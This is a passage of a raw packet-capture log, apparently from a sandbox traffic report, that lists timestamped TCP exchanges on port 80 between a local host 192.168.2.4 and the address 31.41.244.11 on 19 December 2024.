                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.930020094 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.930073023 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.930969000 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.931081057 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.931129932 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.932027102 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.932092905 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.067559004 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.067647934 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.067707062 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.067761898 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.068049908 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.068109989 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.068159103 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.068217993 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.069200993 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.069257975 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.069329023 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.069380999 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.070215940 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.070271015 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.070344925 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.070393085 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.071331024 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.071382046 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.071384907 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.071433067 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.072400093 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.072458029 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.072520018 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.072572947 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.073462963 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.073508978 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.073566914 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.073618889 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.074542046 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.074594021 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.074666977 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.074749947 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.075627089 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.075700045 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.075761080 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.075916052 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.076738119 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.076787949 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.076848030 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.077665091 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.077799082 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.077851057 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.077924967 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.078025103 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.078896046 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.078950882 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.079010963 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.079224110 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.079982042 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.080040932 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.080101967 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.080241919 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.081093073 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.081146002 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.081218958 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.081312895 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.082187891 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.082237005 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.082295895 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.082379103 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.083340883 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.083410025 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.083453894 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.083586931 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.084357023 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.084462881 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.084465027 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.084506989 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.085462093 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.085515022 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.085629940 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.085673094 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.086564064 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.086690903 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.086738110 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.087641001 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.087697029 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.087771893 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.088057041 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.088706017 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.088836908 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.088870049 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.088886023 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.089791059 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.089847088 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.089901924 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.089951992 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.090883970 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.090938091 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.090996027 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.091274977 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.092014074 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.092072964 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.092113972 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.092267990 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.093086004 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.093142033 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.093192101 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.093241930 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.094177008 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.094305992 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.094357014 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.095227003 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.095277071 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.095365047 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.095670938 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.096457958 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.096510887 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.096570969 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.096657991 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.097429991 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.097474098 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.097533941 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.097716093 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.098526001 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.098582983 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.098623037 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.098733902 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.099603891 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.099726915 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.099773884 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.100696087 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.100748062 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.100797892 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.100845098 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.101778030 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.101839066 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.101900101 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.101939917 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.102865934 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.102937937 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.102981091 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.103065968 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.103967905 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.104049921 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.104078054 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.104130030 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.105048895 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.105165958 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.105196953 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.105206966 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.106141090 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.106185913 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.106229067 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.106271982 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.107256889 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.107428074 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.107486010 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.108299971 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.108346939 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.108474970 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.108524084 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.109412909 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.109467983 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.109529018 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.109725952 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.110490084 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.110613108 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.110654116 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.111624002 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.111673117 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.111732006 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.112015009 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.112673998 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.112742901 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.112803936 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.112993002 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.113773108 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.113828897 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.113881111 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.113955021 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.114871025 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.114974976 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.115030050 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.116064072 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.116099119 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.116127968 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.116168976 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.117038012 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.117161989 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.117176056 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.117221117 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.118123055 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.118242025 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.118292093 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.119219065 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.119362116 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.119420052 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.120323896 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.120384932 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.120445013 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.120496988 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.121411085 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.121462107 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.121464014 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.121507883 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.122476101 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.122607946 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.122647047 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.122658014 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.123568058 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.123616934 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.123693943 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.124041080 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.124628067 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.124694109 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.259607077 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.259675026 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.259732008 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.259784937 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.260139942 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.260198116 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.260206938 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.260253906 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.260315895 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.260365009 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.261413097 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.261466980 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.261543036 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.261595011 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.262396097 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.262455940 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.262516022 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.262572050 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.263514042 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.263564110 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.263607025 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.263647079 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.264581919 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.264636040 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.264671087 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.264717102 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.265671015 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.265724897 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.265773058 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.265820980 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.266760111 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.266843081 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.266886950 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.266935110 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.267875910 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.267926931 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.267985106 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.268090010 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.268929958 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.268984079 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.269057989 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.269161940 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.270009995 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.270138979 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.270179033 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.270196915 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.271116018 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.271173000 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.271248102 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.271301985 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.272224903 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.272284031 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.272345066 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.272388935 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.273283958 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.273339987 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.273401022 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.273504972 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.274411917 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.274465084 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.274524927 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.274714947 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.275482893 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.275541067 CET4983880192.168.2.431.41.244.11
